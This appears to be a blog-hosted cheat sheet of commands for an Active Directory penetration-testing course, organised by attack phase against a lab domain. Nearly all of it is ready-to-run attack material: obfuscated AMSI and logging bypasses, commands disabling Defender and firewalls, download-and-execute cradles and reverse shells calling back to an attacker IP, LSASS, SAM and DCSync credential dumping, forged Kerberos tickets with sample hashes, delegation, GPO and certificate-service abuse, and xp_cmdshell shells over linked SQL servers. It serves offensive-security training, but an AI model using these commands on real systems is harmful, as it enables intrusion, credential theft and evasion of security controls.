CRTP Commands CheatSheet

Disclaimer This Cheatsheet is simply a quick reference for the commands and techniques covered throughout the course. All the information shared here is directly related to the course material and is not my own original content.

Enumeration

# Computers
Get-NetComputer | select dnshostname
type .\pcs.txt | Resolve-IPAddress
Get-NetForest -Forest moneycorp.local | select Domains 

# ACLs
Get-ObjectAcl Object-Name –ResolveGUIDs
Get-ObjectAcl -SAMAccountName User –ResolveGUIDs
$sid = Convert-NameToSid wley
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} 
Find-InterestingDomainAcl -ResolveGUIDs -Credential $Cred 
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "student1"}
Invoke-ACLScanner -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs | Where-Object { $_.IdentityReferenceName -like "*student1*" }
# Shares
Import-Module C:\AD\Tools\PowerHuntShares.psm1                                                                
Invoke-HuntSMBShares -NoPing -OutputDirectory C:\AD\Tools\ -HostList C:\AD\Tools\server.txt
Invoke-HuntSMBShares -NoPing -OutputDirectory ./shares/ -HostList ./servers.txt

# BloodHound
./SharpHound.exe -c  All
./SharpHound.exe -c  All -d moneycorp.local

AV Bypass

# Powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
C:\AD\Tools\InviShell\RunWithRegistryAdmin.bat
iex (iwr -UseBasicParsing http://172.16.100.69:8081/sbloggingbypass.txt)
iex (iwr -UseBasicParsing http://172.16.100.69:8081/amsibypass.txt)

# Firewall Bypass
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.69"
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
Powershell.exe "Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False"
winrs -r: "Powershell.exe Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False"
$sess = New-PSSession -ComputerName devsrv.garrison.castle.local
Invoke-command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess 
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

# AV
Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MPPreference -DisableBehaviorMonitoring $true;Set-MPPreference -DisableBlockAtFirstSeen $true;Set-MPPreference -DisableEmailScanning $true;Set-MPPReference -DisableScriptScanning $true;Set-MpPreference -DisableIOAVProtection $true;Add-MpPreference -ExclusionPath "C:\Users\Public"
Add-MpPreference -ExclusionPath "C:\AD\Tools"

# Enhanced Script Logging
[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)

# AMSI
S`eT-It`em ( 'V'+'aR' +  'IA' + (("{1}{0}"-f'1','blE:')+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

## Bypass App Locker for Mimikatz
$8 = "s";
$c = "e";
$g = "k";
$t = "u";
$p = "r";
$n = "l";
$7 = "s";
$6 = "a";
$l = ":";
$2 = ":";
$z = "e";
$e = "k";
$0 = "e";
$s = "y";
$1 = "s";
$Pwn = $8 + $c + $g + $t + $p + $n + $7 + $6 + $l + $2 + $z + $e + $0 + $s + $1 ;
Invoke-Mimi -Command $Pwn

File Transfer

# Download
echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe
Copy-Item C:\AD\Tools\Invoke-Mimi-keys.ps1 \\dcorp-adminsrv\C$\'Program Files'
iwr http://172.16.100.10:8081/Loader.exe -OutFile C:\Users\Public\Loader.exe
winrs -r: "powershell.exe iwr http://172.16.100.69:8081/Loader.exe -OutFile C:\Users\Public\Loader.exe"

# Download and excute
powershell.exe iex (iwr http://172.16.100.69:8081/Invoke-PowerShellTcp.ps1 -UseBasicParsing)
iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.69:8081/PowerView.ps1'))
winrs -r: "powershell.exe iex (iwr -UseBasicParsing http://172.16.100.69:8081/amsibypass.txt)"

Tickets & Creds Harvesting

# Dumps Kerberos encryption keys from LSASS
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe sekurlsa::evasive-keys exit
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'token::elevate' 'sekurlsa::tickets /export' exit

# Dumping LSA & sam secrets
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "lsadump::evasive-lsa /patch exit"
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'token::elevate' 'lsadump::sam' exit
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "lsadump::evasive-sam exit"
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'token::elevate' 'lsadump::secrets' exit
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe token::elevate lsadump::secrets exit
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'token::elevate' 'lsadump::cache' exit

# Logon Passwords
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe sekurlsa::logonpasswords exit

# Dumping Vaults & CredMan
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'token::elevate' 'vault::list' exit
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'token::elevate' 'vault::cred /patch' exit
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'token::elevate' 'vault::cred' exit
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'token::elevate' 'lsadump::credman' exit
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'token::elevate' 'Evasive-dpapi' exit
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'token::elevate' 'sekurlsa::dpapi' exit
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'token::elevate' 'dpapi::chrome' exit
C:\Users\Public\Loader.exe -path http://172.16.100.10:8081/SafetyKatz.exe 'sekurlsa::msv' exit

# DCSync Attack
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt" "exit"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

# Cracking
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt

Creating & Loading Tickets

# Pass The Hash
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::evasive-pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe" "exit"

# OverPass the Hash
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada000cd0138ec5ca2835060009dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:dollarcorp.moneycorp.local /aes256:<aes256keys> /run:cmd.exe" "exit"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::pth /user:administrator /domain:dollarcorp.moneycorp.local /aes256:<aes256keys> /run:cmd.exe" "exit"

# Golden Tikcet
## mimkatz
C:\AD\Tools\Loader.exe C:\AD\Tools\SafetyKatz.exe "kerberos::golden /user:Administrator /domain:moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648  /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /id:500"
## Rubues
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /printcmd
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:591 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt

# Silver Ticket
## HTTP - Using Machine account hash (dcorp-dc$)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:9a5e64e2c4e303adccdf112e7be06803 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
## WMI
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:9a5e64e2c4e303adccdf112e7be06803 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:9a5e64e2c4e303adccdf112e7be06803 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

# Dimaond Ticket
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# Injecting Tickets
### Rubues
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket:"base64 | file.kirbi"
### Mimkatz
kerberos::ptt $ticket_kirbi_file
kerberos::ptt $ticket_ccache_file
## TGT -> TGS
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:http/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt /ticket:
## SPN SUB
Rubeus.exe tgssub /altservice:cifs /ticket:"TGS base64 | ticket.kirbi"

Local PrivEsc

Import-Module C:\AD\Tools\PowerUp.ps1
. C:\AD\Tools\PowerUp.ps1
Invoke-AllChecks
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'corp\studentuser1' -Verbose
Install-ServiceBinary -Name 'edgeupdatem' -UserName 'corp\studentuser1' -Verbose
Write-HijackDll -DllPath 'C:\Users\studentuser\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll' -UserName 'corp\studentuser1'

User Session Hunting

# where the current user has local administrator access
Find-LocalAdminAccess
# winRM Access
Import-Module C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
# Find all admins on all computers
Invoke-EnumerateLocalAdmin
# the current user has local admin access to found machines
Invoke-UserHunter [-GroupName <group_name>] [-CheckAccess]
# Find computers where a domain admin (or specified user/group) has sessions
Find-DomainUserLocation -Verbose
Find-DomainUserLocation -UserGroupIdentity "RDUsers"
# Active user sessions on remote computers. No admin privileges required
Invoke-SessionHunter -NoPortScan -RawResults | select Hostname,UserSession,Access

Reverse shell

powershell.exe iex (iwr http://172.16.100.69:8081/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.69 -Port 443
powershell.exe iex (iwr http://172.16.100.69:8081/Invoke-PowerShellTcpEx.ps1 -UseBasicParsing)

Kerberos Attacks

# Kerberoasting 
Get-DomainUser -SPN
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt

# Unconstrained Delegation 
Get-NetComputer -UnConstrained | select dnshostname
Get-NetComputer -UnConstrained
## Compromise the server that has the unconstrained delegation
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:admin /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
## Run Rubes in Listener Mode in the machine that has the unconstrained delegation
C:\Users\Public\Loader.exe -path http://172.16.100.69:8081/Rubeus.exe -args monitor /targetuser:DCORP-DC$ /interval:5 /nowrap
## On you Own Machine - Trigger the Printer Bug
C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket:
## On you Own Machine - Trigger Windows Search Protocol (MS-WSP)
C:\AD\Tools\Loader.exe -path C:\AD\tools\WSPCoerce.exe -args DCORP-DC DCORP-APPSRV
## On you Own Machine - Trigger Distributed File System Protocol (MS-DFSNM)
C:\AD\Tools\DFSCoerce-andrea.exe -t dcorp-dc -l dcorp-appsrv

# User Constrained Delegation
Get-DomainUser -TrustedToAuth
## Compromise the server that has the constrained delegation
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\websvc" "exit"
## get Access to CIFS service for the user that has the constrained delegation
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
dir \\dcorp-mssql.dollarcorp.moneycorp.LOCAL\c$\

# Computer Constrained Delegation
Get-DomainComputer -TrustedToAuth
## Compromise the server that has the constrained delegation
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\dcorp-adminsrv$" "exit"
## get Access to LDAP by swittching the TIME service for the computer that has the constrained delegation
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt
## Using the LDAP ticket let's perform DCSync attack
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt" "exit"

# Resource Based Constrained Delegation
Import-Module C:\AD\Tools\PowerView.ps1
$computers = Get-DomainComputer
$users = Get-DomainUser
$accessRights = "GenericWrite","GenericAll","WriteProperty","WriteDacl"
foreach ($computer in $computers) {
	$acl = Get-ObjectAcl -SamAccountName $computer.SamAccountName -ResolveGUIDs
	foreach ($user in $users) {
	$hasAccess = $acl | ?{$_.SecurityIdentifier -eq $user.ObjectSID} | %{($_.ActiveDirectoryRights -match ($accessRights -join '|'))}
	if ($hasAccess) {
		Write-Output "$($user.SamAccountName) has the required access
rights on $($computer.Name)"
		}
	}
}
## Find a PC that has Generic-Write over a user
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}
## Obtain the credentials for the account that was configured for delegation.
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::evasive-keys" "exit"
## Access the user that has the generic wite - OPTH
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:STUDVM$ /aes256:b8ffa49856aec2c949a230e5cb5b7f44e4d68c7089b4cd52ee864c670d365329 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
## Setup the RBCD
iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.69:8081/PowerView.ps1'))
Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std69$' -Verbose
Set-DomainRBCD -Identity mgmtsrv -DelegateFrom 'studvm$' -Verbose
## Confrim that it has been created
Get-DomainRBCD
## Abuse the RBCD to access dcorp-mgmt as Administrator
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-std69$ /aes256:b8dd569eb3d6044df788e1cff426a1d8f8de47d51be5e50e24c3715d35524b22 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt

Privilege’s Escalation

# Remote Scheduled Tasks
schtasks /create /S mgmtsrv.money.corp /SC Weekly /RU "NT Authority\SYSTEM" /TN "exp" /TR "powershell.exe -c'iex (New-Object Net.WebClient).DownloadString("http://172.16.100.1/Invoke-PowerShellTcp.ps1"")
schtasks /Run /S mgmtsrv.money.CORP /TN "exp"
# GPOddity Attacks
## Linux
ntlmrelayx.py -t 'ldaps://172.16.2.1' -wh '172.16.100.69:8080' --http-port '80,8080' -i --no-smb-server
nc 127.0.0.1 11000
	write_gpo_dacl student69 "{0BF8D01C-1F62-4BDC-958C-57140B67D147}"
python3 gpoddity.py --gpo-id '0BF8D01C-1F62-4BDC-958C-57140B67D147' --domain 'dollarcorp.moneycorp.local' --username 'student69' --password 'Vy9nruT5NSGz5XyL' --command 'net localgroup administrators student69 /add' --rogue-smbserver-ip '172.16.100.69' --rogue-smbserver-share 'itsfading_gpo' --dc-ip 172.16.2.1  --smb-mode none
mkdir /mnt/c/ad/toolsitsfading_gpo
cd itsfading_gpo/
cp ../GPOddity/GPT_out/* . -r
net share itsfading_gpo=C:\AD\Tools\itsfading_gpo /grant:Everyone,Full
icacls "C:\AD\Tools\itsfading_gpo" /grant Everyone:F /T
Get-DomainGPO -Identity 'DevOps Policy'
gpupdate /force
winrs -r:dcorp-ci cmd

# Parent Child Trust
## ExtraSID - Domain Trust Key
### Start a shell Using a DA account
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
### Extracting Trust Key
echo F | xcopy C:\ad\tools\\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe
winrs -r:dcorp-dc cmd.exe
C:\Users\Public\Loader.exe -path http://172.16.100.69:8081/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
### Get Required Info
Get-DomainGroup -Identity "Enterprise Admins" -Domain moneycorp.local | select objectsid
Get-DomainSID
### Forge the Trust ticket
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:8ca58cb947fec09c1d7f394a87dc00b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
### get HTTP TGS from TGT
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:http/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt /ticket:
### DCSync on Mcorp-dc
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

## ExtraSID - KRBTGT
### Get Required Info
Get-DomainGroup -Identity "Enterprise Admins" -Domain moneycorp.local | select objectsid
Get-DomainSID
### Get KTBGTG hash
c:\Users\Public\Loader.exe -path http://172.16.100.69:8081/SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt" "exit"
### Forge the trust ticket
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /user:Administrator /id:500 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /netbios:dcorp /ptt
SafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

# Cross Forest Trust
## ExtraSID - Domain Trust Key
### Start a shell Using a DA account
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
### Extracting Trust Key
echo F | xcopy C:\ad\tools\\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe
winrs -r:dcorp-dc cmd.exe
C:\Users\Public\Loader.exe -path http://172.16.100.69:8081/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
### Forge the trust ticket
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:496fde962c336e209ad5a46f07771bd4 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /nowrap
### Inject the ticket
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:

# AD CS
c:\AD\Tools\Certify.exe cas
c:\AD\Tools\Certify.exe find
c:\AD\Tools\Certify.exe find /vunlerable

## ECS1
C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
C:\AD\Tools\openssl\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out ./cert.pfx
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:cert.pfx /password:SecretPass@123 /ptt

## ECS3
C:\AD\Tools\Certify.exe find /vunlerable
### Request a certificate template
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\ca\cert1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\ca\cert1.pfx
### Using a certificate template to request anther certificate
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\ca\cert1.pfx /enrollcertpw:SecretPass@123
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\ca\cert2.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\ca\cert2.pfx
C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:C:\AD\Tools\ca\cert2.pfx /password:SecretPass@123 /ptt

Lateral Movement

# Loading Domain User Creds into memory
$SecPassword = ConvertTo-SecureString 'Password01' -AsPlainText -Force
$SecPassword = ConvertTo-SecureString $pass -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('corp\studentuser', $SecPassword)

# Groups
net localgroup "Remote Desktop Users" "studvm" /add
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
net localgroup "Remote Management Users" "studvm" /add
net localgroup administrators "studvm" /add

# MYSQL
## Enumeration
Get-ADGroup -Filter * | Where-Object { $_.Name -like "*SQL*Admin*" } | Select Name, DistinguishedName
Get-ADGroupMember -Identity "SQL-Admins" | Select Name, SamAccountName
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose

## PowerUpSQL
Import-Module .\PowerUpSQL-master\PowerUpSQL.ps1
Get-SQLInstanceDomain
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose
### RCE
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'set username'"
### Reverse Shel
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.69:8081/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.69:8081/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.69:8081/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql2
Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'

## HeidiSQL
### enumerate linked databases
select * from master..sysservers
###  further links from
select * from openquery("DCORP-SQL1",'select * from master..sysservers')
### nest openquery within another openquery
select * from openquery("DCORP-SQL1",'select * from openquery("DCORP-MGMT",''select * from master..sysservers'')')

CRTP Commands CheatSheet

Enumeration

AV Bypass

File Transfer

Tickets & Creds Harvesting

Creating & Loading Tickets

Local PrivEsc

User Session Hunting

Reverse shell

Kerberos Attacks

Privilege’s Escalation

Lateral Movement

Further Reading

Red Team Operator (CRTO) Commands CheatSheet

Breaking the Vault | A Detailed Walkthrough of The RedTeam Capstone Challenge

Active Directory Basics

Trending Tags